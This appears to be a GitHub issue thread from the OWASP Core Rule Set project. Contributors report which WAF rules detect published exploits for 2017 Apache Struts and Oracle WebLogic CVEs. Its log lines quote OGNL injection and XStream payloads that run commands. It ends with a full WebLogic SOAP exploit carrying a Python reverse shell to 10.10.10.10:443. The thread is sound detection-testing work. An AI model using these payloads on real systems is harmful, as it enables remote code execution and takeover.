Hi @franbuehler, I'm pretty busy for the moment but if I have some time to spare I would like to test at least some of the most common exploits available, like those from exploitdb, not all of them apply but certainly many will fit into the category and should be mitigated by 944 or some other CRS rules (e.g. RCE).
I had time this week to study this issue.
I was looking for exploits to test these Apache Struts vulnerabilities (2017 only).
Not every vulnerability has an exploit.
But what I can say is that any vulnerability that has a published exploit is detected by CRS.
That is good news!
id "913100": "Matched Data: struts-pwn found within REQUEST_HEADERS: User-Agent: struts-pwn (https://github.com/mazen160/struts-pwn)"
id "944130": "Matched Data: %{#context['com.opensymphony.xwork2.dispatcher.httservletresponse'].addheader('...')} found within REQUEST_HEADERS: Content-Type"
id "944100": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contains('win'))).(#cmds=(#isw..."
id "944110": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#isw..."
id "944130": "Matched Data: %{(#_='multipart/form-data').(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.system@getproperty('os.name').tolowercase().contains('win'))).(#cmds=(#isw..."
CVE-2017-7672: No exploit found
CVE-2017-9787: No exploit found
CVE-2017-9791: Exploit tested: https://www.exploit-db.com/exploits/42324/:
id "920370": "Operator GT matched 400 at ARGS:name"
id "933160": "Matched Data: exec('cat /etc/bla')) found within ARGS:name: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('cat /etc/bla'))}"
id "944100": "Matched Data: %{(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(@java.lang.runtime@getruntime().exec('cat /etc/bla'))} found within ARGS:name"
id "944100": "Matched Data: age=20&__checkbox_bustedbefore=true&name=%25%7b%28%23dm%3d%40ognl.ognlcontext%40default_member_access%29.%28%23_memberaccess%3f%28%23_memberaccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.actioncontext.container%27%5d%29.%28%23ognlutil%3d%23container.getinstance%28%40com.opensymphony.xwork2.ognl.ognlutil%40class%29%29.%28%23ognlutil.getexcludedpackagenames%28%29.clear%28%29%29.%28%23ognlutil.getexcludedclasses%28%29.clear%28%29%29.%28%23context.setmemberacce..."
id "944110": "Matched Data: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(@java.lang.Runtime@getRuntime().exec('cat /etc/bla'))} found within ARGS:name
id "944110": "Matched Data: age=20&__checkbox_bustedBefore=true&name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAcce..."
id "944130": "Matched Data: %{(#[email protected]@default_member_access).(#_memberaccess?(#_memberaccess=#dm):((#container=#context['com.opensymphony.xwork2.actioncontext.container']).(#ognlutil=#container.getinstance(@com.opensymphony.xwork2.ognl.ognlutil@class)).(#ognlutil.getexcludedpackagenames().clear()).(#ognlutil.getexcludedclasses().clear()).(#context.setmemberaccess(#dm)))).(@java.lang.runtime@getruntime().exec('cat /etc/bla'))} found within ARGS:name"
id "944130": "Matched Data: age=20&__checkbox_bustedbefore=true&name=%25%7b%28%23dm%3d%40ognl.ognlcontext%40default_member_access%29.%28%23_memberaccess%3f%28%23_memberaccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.actioncontext.container%27%5d%29.%28%23ognlutil%3d%23container.getinstance%28%40com.opensymphony.xwork2.ognl.ognlutil%40class%29%29.%28%23ognlutil.getexcludedpackagenames%28%29.clear%28%29%29.%28%23ognlutil.getexcludedclasses%28%29.clear%28%29%29.%28%23context.setmemberacce..."
id "932160": "Matched Data: bin/sh found within XML: 0 false 0/bin/sh-ccat/etc/foo false java.lang.processbuilder start foo foo false 0 0 false false 0 "
id "944100": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..."
id "944100": "Matched Data: java.lang.processbuilder$nullinputstream found within XML"
id "944110": "Matched Data: com.sun.xml.internal.bind.v2.runtime.unmsarshaller.Base64Data found within XML"
id "944110": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..."
id "944110": "Matched Data: java.util.Collections$EmptyIterator found within XML"
id "944110": "Matched Data: java.lang.ProcessBuilder$NullInputStream found within XML"
id "944130": "Matched Data: \\x0a \\x0a 0\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a false \\x0a 0\\\x0a \\x0a \\x0a \\x0a \\x0a \\x0a /bin/sh-ccat /etc/foo\\x0a \\x0a false\\x0a \\x0a \\x0a \\x0a \\x0a ja..." found within XML"
id "944130": "Matched Data: java.lang.processbuilder found within XML"
id "944130": "Matched Data: java.lang.processbuilder$nullinputstream found within XML"
Maybe we could now add these CVE numbers to the comment of the triggered rules?
Another test:
Oracle Weblogic vulnerability CVE-2017-10271 tested with https://www.exploit-db.com/exploits/43458/
Triggers:
id "932105": msg "Remote Command Execution: Unix Command Injection"
id "932115": msg "Remote Command Execution: Windows Command Injection"
id "932150": msg "Remote Command Execution: Direct Unix Command Execution"
id "932160": msg "Remote Command Execution: Unix Shell Code Found"
id "944100": msg "Remote Command Execution: Suspicious Java class detected"
id "944110": msg "Remote Command Execution: Java process spawn (CVE-2017-9805)" - triggers twice
id "944130": msg "Suspicious Java class detected" - triggers twice
Payload:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>/bin/sh</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.du
p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Could you include the new payload in your comment, please?
Solved in PR #1256.
Most helpful comment
I had time this week to study this issue.
I was looking for exploits to test these Apache Struts vulnerabilities (2017 only).
Not every vulnerability has an exploit.
But what I can say is that any vulnerability that has a published exploit is detected by CRS.
That is good news!
CVE-2017-7672: No exploit found
CVE-2017-9787: No exploit found
CVE-2017-9791: Exploit tested: https://www.exploit-db.com/exploits/42324/:
Maybe we could now add these CVE numbers to the comment of the triggered rules?